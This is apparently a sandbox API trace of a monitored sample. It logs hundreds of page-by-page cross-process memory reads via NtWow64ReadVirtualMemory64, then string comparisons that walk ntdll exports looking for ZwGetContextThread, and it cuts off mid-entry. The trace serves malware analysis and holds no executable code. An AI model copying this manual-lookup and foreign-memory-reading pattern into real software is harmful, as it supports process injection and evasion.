[0076.278] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fc000, Buffer=0x7ff8, BufferSize=0x25fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.278] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fd000, Buffer=0x7ff8, BufferSize=0x25fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.278] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fe000, Buffer=0x7ff8, BufferSize=0x25fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.279] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ff000, Buffer=0x7ff8, BufferSize=0x25ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.279] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee400000, Buffer=0x7ff8, BufferSize=0x2600000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.279] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee401000, Buffer=0x7ff8, BufferSize=0x2601000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.279] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee402000, Buffer=0x7ff8, BufferSize=0x2602000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.279] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee403000, Buffer=0x7ff8, BufferSize=0x2603000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.280] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee404000, Buffer=0x7ff8, BufferSize=0x2604000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.280] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee405000, Buffer=0x7ff8, BufferSize=0x2605000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.280] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee406000, Buffer=0x7ff8, BufferSize=0x2606000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.280] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee407000, Buffer=0x7ff8, BufferSize=0x2607000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.280] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee408000, Buffer=0x7ff8, BufferSize=0x2608000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.280] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee409000, Buffer=0x7ff8, BufferSize=0x2609000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.281] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40a000, Buffer=0x7ff8, BufferSize=0x260a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.281] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40b000, Buffer=0x7ff8, BufferSize=0x260b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.281] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40c000, Buffer=0x7ff8, BufferSize=0x260c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.281] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40d000, Buffer=0x7ff8, BufferSize=0x260d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.281] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40e000, Buffer=0x7ff8, BufferSize=0x260e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.281] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40f000, Buffer=0x7ff8, BufferSize=0x260f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.282] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee410000, Buffer=0x7ff8, BufferSize=0x2610000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.282] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee411000, Buffer=0x7ff8, BufferSize=0x2611000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.282] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee412000, Buffer=0x7ff8, BufferSize=0x2612000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.282] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee413000, Buffer=0x7ff8, BufferSize=0x2613000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.282] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee414000, Buffer=0x7ff8, BufferSize=0x2614000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.282] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee415000, Buffer=0x7ff8, BufferSize=0x2615000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.283] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee416000, Buffer=0x7ff8, BufferSize=0x2616000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.283] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee417000, Buffer=0x7ff8, BufferSize=0x2617000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.283] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee418000, Buffer=0x7ff8, BufferSize=0x2618000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.283] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee419000, Buffer=0x7ff8, BufferSize=0x2619000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.283] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41a000, Buffer=0x7ff8, BufferSize=0x261a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.284] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41b000, Buffer=0x7ff8, BufferSize=0x261b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.284] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41c000, Buffer=0x7ff8, BufferSize=0x261c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.284] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41d000, Buffer=0x7ff8, BufferSize=0x261d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.285] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41e000, Buffer=0x7ff8, BufferSize=0x261e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.285] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41f000, Buffer=0x7ff8, BufferSize=0x261f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.285] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee420000, Buffer=0x7ff8, BufferSize=0x2620000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.285] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee421000, Buffer=0x7ff8, BufferSize=0x2621000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.285] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee422000, Buffer=0x7ff8, BufferSize=0x2622000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.286] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee423000, Buffer=0x7ff8, BufferSize=0x2623000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.286] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee424000, Buffer=0x7ff8, BufferSize=0x2624000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.286] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee425000, Buffer=0x7ff8, BufferSize=0x2625000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.286] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee426000, Buffer=0x7ff8, BufferSize=0x2626000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.286] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee427000, Buffer=0x7ff8, BufferSize=0x2627000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.287] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee428000, Buffer=0x7ff8, BufferSize=0x2628000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.287] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee429000, Buffer=0x7ff8, BufferSize=0x2629000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.287] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42a000, Buffer=0x7ff8, BufferSize=0x262a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.287] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42b000, Buffer=0x7ff8, BufferSize=0x262b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.287] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42c000, Buffer=0x7ff8, BufferSize=0x262c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.288] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42d000, Buffer=0x7ff8, BufferSize=0x262d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.288] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42e000, Buffer=0x7ff8, BufferSize=0x262e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.288] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42f000, Buffer=0x7ff8, BufferSize=0x262f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.288] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee430000, Buffer=0x7ff8, BufferSize=0x2630000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.288] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee431000, Buffer=0x7ff8, BufferSize=0x2631000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.289] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee432000, Buffer=0x7ff8, BufferSize=0x2632000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.289] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee433000, Buffer=0x7ff8, BufferSize=0x2633000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.289] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee434000, Buffer=0x7ff8, BufferSize=0x2634000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.289] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee435000, Buffer=0x7ff8, BufferSize=0x2635000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.289] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee436000, Buffer=0x7ff8, BufferSize=0x2636000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.289] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee437000, Buffer=0x7ff8, BufferSize=0x2637000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.290] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee438000, Buffer=0x7ff8, BufferSize=0x2638000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.290] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee439000, Buffer=0x7ff8, BufferSize=0x2639000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.290] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43a000, Buffer=0x7ff8, BufferSize=0x263a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.290] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43b000, Buffer=0x7ff8, BufferSize=0x263b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.290] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43c000, Buffer=0x7ff8, BufferSize=0x263c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.291] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43d000, Buffer=0x7ff8, BufferSize=0x263d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.291] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43e000, Buffer=0x7ff8, BufferSize=0x263e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.291] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43f000, Buffer=0x7ff8, BufferSize=0x263f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.291] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee440000, Buffer=0x7ff8, BufferSize=0x2640000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.291] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee441000, Buffer=0x7ff8, BufferSize=0x2641000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.291] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee442000, Buffer=0x7ff8, BufferSize=0x2642000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.292] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee443000, Buffer=0x7ff8, BufferSize=0x2643000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.292] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee444000, Buffer=0x7ff8, BufferSize=0x2644000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.292] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee445000, Buffer=0x7ff8, BufferSize=0x2645000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.293] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee446000, Buffer=0x7ff8, BufferSize=0x2646000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.293] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee447000, Buffer=0x7ff8, BufferSize=0x2647000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.293] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee448000, Buffer=0x7ff8, BufferSize=0x2648000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.293] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee449000, Buffer=0x7ff8, BufferSize=0x2649000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.293] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44a000, Buffer=0x7ff8, BufferSize=0x264a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.293] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44b000, Buffer=0x7ff8, BufferSize=0x264b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.294] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44c000, Buffer=0x7ff8, BufferSize=0x264c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.294] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44d000, Buffer=0x7ff8, BufferSize=0x264d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.294] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44e000, Buffer=0x7ff8, BufferSize=0x264e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.294] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44f000, Buffer=0x7ff8, BufferSize=0x264f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.294] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee450000, Buffer=0x7ff8, BufferSize=0x2650000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.295] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee451000, Buffer=0x7ff8, BufferSize=0x2651000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.295] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee452000, Buffer=0x7ff8, BufferSize=0x2652000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.296] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee453000, Buffer=0x7ff8, BufferSize=0x2653000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.296] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee454000, Buffer=0x7ff8, BufferSize=0x2654000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.296] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee455000, Buffer=0x7ff8, BufferSize=0x2655000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.296] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee456000, Buffer=0x7ff8, BufferSize=0x2656000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.296] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee457000, Buffer=0x7ff8, BufferSize=0x2657000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.297] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee458000, Buffer=0x7ff8, BufferSize=0x2658000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.297] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee459000, Buffer=0x7ff8, BufferSize=0x2659000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.297] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45a000, Buffer=0x7ff8, BufferSize=0x265a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.297] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45b000, Buffer=0x7ff8, BufferSize=0x265b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.297] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45c000, Buffer=0x7ff8, BufferSize=0x265c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.297] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45d000, Buffer=0x7ff8, BufferSize=0x265d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.298] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45e000, Buffer=0x7ff8, BufferSize=0x265e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.298] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45f000, Buffer=0x7ff8, BufferSize=0x265f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.298] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee460000, Buffer=0x7ff8, BufferSize=0x2660000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.298] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee461000, Buffer=0x7ff8, BufferSize=0x2661000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.298] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee462000, Buffer=0x7ff8, BufferSize=0x2662000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.299] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee463000, Buffer=0x7ff8, BufferSize=0x2663000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.299] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee464000, Buffer=0x7ff8, BufferSize=0x2664000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.299] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee465000, Buffer=0x7ff8, BufferSize=0x2665000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.641] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA 